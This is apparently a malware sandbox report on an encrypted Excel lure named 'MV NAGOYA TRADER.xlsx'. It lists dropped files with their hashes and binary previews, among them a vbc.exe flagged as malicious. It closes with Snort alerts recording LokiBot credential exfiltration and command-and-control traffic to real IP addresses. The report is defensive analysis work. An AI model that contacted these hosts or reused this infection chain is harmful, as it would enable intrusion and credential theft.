Preview:	....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i........................................................................N.T.....................N.T........ ....y.Q........ ............z.Q............_...............................X...%...7...................{ .@................C.a.l.i.b.r.................X.......D....2.Q.................{.Q............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... .t.6...F..........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E522A556.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck Download File
Process:	C:\Users\Public\vbc.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	32430
Entropy (8bit):	0.6025336819236282
Encrypted:	false
SSDEEP:	12:seeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeh:i
MD5:	1A3D31826F727A043FE4CC0C448264C3
SHA1:	B9D22C89F4678CBCFB9020F0344FE88449566C0F
SHA-256:	02CAC96B35CDFFA917839EFF306896676F0A8CC4B003962FEF0FF8DC773125CB
SHA-512:	1E32EC6515B98C3BE70BC251B29F4F66DC136CCEC4E30726EDAE365438AEF1AA5FB0E7147DD57A765815D72142055F23E5FE96DD2F3B91909BA305AB817E7F78
Malicious:	false
Reputation:	low
Preview:	........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

C:\Users\user\Desktop\~$MV NAGOYA TRADER.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	584704
Entropy (8bit):	7.31402329860771
Encrypted:	false
SSDEEP:	12288:ek3fNrqcsXP04X8QGETcxAtAHp5LcPgKaIJVPfHAZ0xnJWBIlO+T2U7H:vfYJ/04XuE0Agp54PH
MD5:	3EE960D7D595C82B47CE28164AFED056
SHA1:	FD750607C392744A3302538C2A0B0FE810D199BB
SHA-256:	7596F11C31683CC9137672D261E19B4DD61952BAD97545080A1663AB475283B2
SHA-512:	F5432D376F7390C3A4EAD25CD167286FB9B99421354302AFF7739B30AB2DF825EAE16D05DE1308268DF27B60B01F8150A42707C7B6367A5D051E0AD443A49462
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V................0.................. ... ....@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........................V...{...........................................].:....w..H.3...c.abf............%..........;x;x. @...o.p.1.........G.e..W..@+...Qx..".B.Y.\|^..C...3&..S..~........../......uv/@..iMM.%.....'.......=1.4z..\|.)..Q\.KU...M.A{.\|...;...51.F.lp..e..niy...C....U1\M.Ri......(..R?..EN.%....v~..l........#$...)J.B=.5.q...@U.G.....e..c.z....Zu...A.Wua)b.1...`..:<^...A\){...;...,...g..2.......?p{x@...D'.%..e`$x..hP........8O...VZ........#.ck.p-.T...V

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.996815692043313
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	MV NAGOYA TRADER.xlsx
File size:	2653184
MD5:	dd41f88e3d53755f0aa1318bf473d08b
SHA1:	54ccf49aaf860ab2531b37dd38adc0273b6f2551
SHA256:	6f68432c8c109e52980cef46236114266c97a5791808053b07a943d7686f8f55
SHA512:	7596de55f96cfb9b2a38a21750209b1941a9e9b6ef6a801fe3b56d81cbf118296042b74fa032ce71546c92c09fe1569d1e2887f65fd2a0aa40d600e70bfd23a6
SSDEEP:	49152:7ypWkhzJao3Wmqugef4weOPWP2hMpNm1NBaw3ZraPJSx6JSutUcZYVg:mzmm1g1weOJyp+rE8x6JPUTg
File Content Preview:	........................>...................)...........................................................................................~...............z.......\|.......~...............z.......\|.......~...............z.......\|.......~......................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "MV NAGOYA TRADER.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2628408

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	2628408
Entropy:	7.99993139379
Base64 Encoded:	True
Data ASCII:	# . ( . . . . . . . $ Y j E A . . . \\ . * . . . . . . . . , . S . . . g . . . . . . . . _ 0 g W . . . . . . . . . I . . % l # U < V . @ . . 8 . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } .
Data Raw:	23 1b 28 00 00 00 00 00 89 ab 24 59 6a 45 41 a1 01 1b 5c a5 2a 09 b1 8f 8b e5 1b ec be 2c 12 53 da aa d9 67 f5 18 07 8a cb 20 7f cc 08 5f 30 67 57 12 e4 d5 10 a3 99 0e 9c ad 49 ed b9 25 6c 23 55 3c 56 db 40 c9 f3 38 df 03 ee bf 04 4f 7d ba 45 db fe ef d9 b2 71 a7 df 03 ee bf 04 4f 7d ba 45 db fe ef d9 b2 71 a7 df 03 ee bf 04 4f 7d ba 45 db fe ef d9 b2 71 a7 df 03 ee bf 04 4f 7d ba

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.57774966758
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . a . . : . . . . . / , D . . . . . j l t ; J q . . . h . . . D . . . . . L . y . . . # Y $ O . . . ( k . . . G . . . : @ . . . _ . z
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/21/20-08:33:20.406845	TCP	2022550	ET TROJAN Possible Malicious Macro DL EXE Feb 2016	49167	80	192.168.2.22	103.141.138.119
12/21/20-08:33:32.340297	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49168	80	192.168.2.22	185.193.143.118
12/21/20-08:33:32.340297	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49168	80	192.168.2.22	185.193.143.118
12/21/20-08:33:32.340297	TCP	2025381	ET TROJAN LokiBot Checkin	49168	80	192.168.2.22	185.193.143.118
12/21/20-08:33:32.340297	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49168	80	192.168.2.22	185.193.143.118
12/21/20-08:33:32.340297	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49168	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.097277	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49169	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.097277	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49169	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.097277	TCP	2025381	ET TROJAN LokiBot Checkin	49169	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.097277	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49169	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.097277	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49169	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.482025	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49170	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.482025	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49170	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.482025	TCP	2025381	ET TROJAN LokiBot Checkin	49170	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.482025	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49170	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.482025	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49170	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.668129	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49170	185.193.143.118	192.168.2.22
12/21/20-08:33:33.982963	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49171	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.982963	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49171	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.982963	TCP	2025381	ET TROJAN LokiBot Checkin	49171	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.982963	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49171	80	192.168.2.22	185.193.143.118
12/21/20-08:33:33.982963	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49171	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.172880	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49171	185.193.143.118	192.168.2.22
12/21/20-08:33:34.470275	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49172	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.470275	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49172	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.470275	TCP	2025381	ET TROJAN LokiBot Checkin	49172	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.470275	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49172	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.470275	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49172	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.668154	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49172	185.193.143.118	192.168.2.22
12/21/20-08:33:34.978436	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49173	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.978436	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49173	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.978436	TCP	2025381	ET TROJAN LokiBot Checkin	49173	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.978436	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49173	80	192.168.2.22	185.193.143.118
12/21/20-08:33:34.978436	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49173	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.166301	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49173	185.193.143.118	192.168.2.22
12/21/20-08:33:35.458680	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49174	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.458680	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49174	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.458680	TCP	2025381	ET TROJAN LokiBot Checkin	49174	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.458680	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49174	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.458680	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49174	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.642135	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49174	185.193.143.118	192.168.2.22
12/21/20-08:33:35.934755	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49175	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.934755	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49175	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.934755	TCP	2025381	ET TROJAN LokiBot Checkin	49175	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.934755	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49175	80	192.168.2.22	185.193.143.118
12/21/20-08:33:35.934755	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49175	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.116868	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49175	185.193.143.118	192.168.2.22
12/21/20-08:33:36.417719	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49176	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.417719	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49176	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.417719	TCP	2025381	ET TROJAN LokiBot Checkin	49176	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.417719	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49176	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.417719	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49176	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.615480	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49176	185.193.143.118	192.168.2.22
12/21/20-08:33:36.908483	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49177	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.908483	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49177	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.908483	TCP	2025381	ET TROJAN LokiBot Checkin	49177	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.908483	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49177	80	192.168.2.22	185.193.143.118
12/21/20-08:33:36.908483	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49177	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.104372	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49177	185.193.143.118	192.168.2.22
12/21/20-08:33:37.413851	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49178	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.413851	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49178	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.413851	TCP	2025381	ET TROJAN LokiBot Checkin	49178	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.413851	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49178	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.413851	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49178	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.608020	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49178	185.193.143.118	192.168.2.22
12/21/20-08:33:37.896116	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49179	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.896116	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49179	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.896116	TCP	2025381	ET TROJAN LokiBot Checkin	49179	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.896116	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49179	80	192.168.2.22	185.193.143.118
12/21/20-08:33:37.896116	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49179	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.091372	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49179	185.193.143.118	192.168.2.22
12/21/20-08:33:38.365580	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49180	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.365580	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49180	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.365580	TCP	2025381	ET TROJAN LokiBot Checkin	49180	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.365580	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49180	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.365580	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49180	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.546296	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49180	185.193.143.118	192.168.2.22
12/21/20-08:33:38.845704	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49181	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.845704	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49181	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.845704	TCP	2025381	ET TROJAN LokiBot Checkin	49181	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.845704	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49181	80	192.168.2.22	185.193.143.118
12/21/20-08:33:38.845704	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49181	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.040893	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49181	185.193.143.118	192.168.2.22
12/21/20-08:33:39.320762	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49182	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.320762	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49182	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.320762	TCP	2025381	ET TROJAN LokiBot Checkin	49182	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.320762	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49182	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.320762	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49182	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.513074	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49182	185.193.143.118	192.168.2.22
12/21/20-08:33:39.813664	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49183	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.813664	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49183	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.813664	TCP	2025381	ET TROJAN LokiBot Checkin	49183	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.813664	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49183	80	192.168.2.22	185.193.143.118
12/21/20-08:33:39.813664	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49183	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.004152	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49183	185.193.143.118	192.168.2.22
12/21/20-08:33:40.294286	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49184	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.294286	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49184	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.294286	TCP	2025381	ET TROJAN LokiBot Checkin	49184	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.294286	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49184	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.294286	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49184	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.472325	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49184	185.193.143.118	192.168.2.22
12/21/20-08:33:40.742276	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49185	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.742276	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49185	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.742276	TCP	2025381	ET TROJAN LokiBot Checkin	49185	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.742276	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49185	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.742276	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49185	80	192.168.2.22	185.193.143.118
12/21/20-08:33:40.927835	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49185	185.193.143.118	192.168.2.22
12/21/20-08:33:41.221610	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49186	80	192.168.2.22	185.193.143.118
12/21/20-08:33:41.221610	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49186	80	192.168.2.22	185.193.143.118
12/21/20-08:33:41.221610	TCP	2025381	ET TROJAN LokiBot Checkin	49186	80	192.168.2.22	185.193.143.118
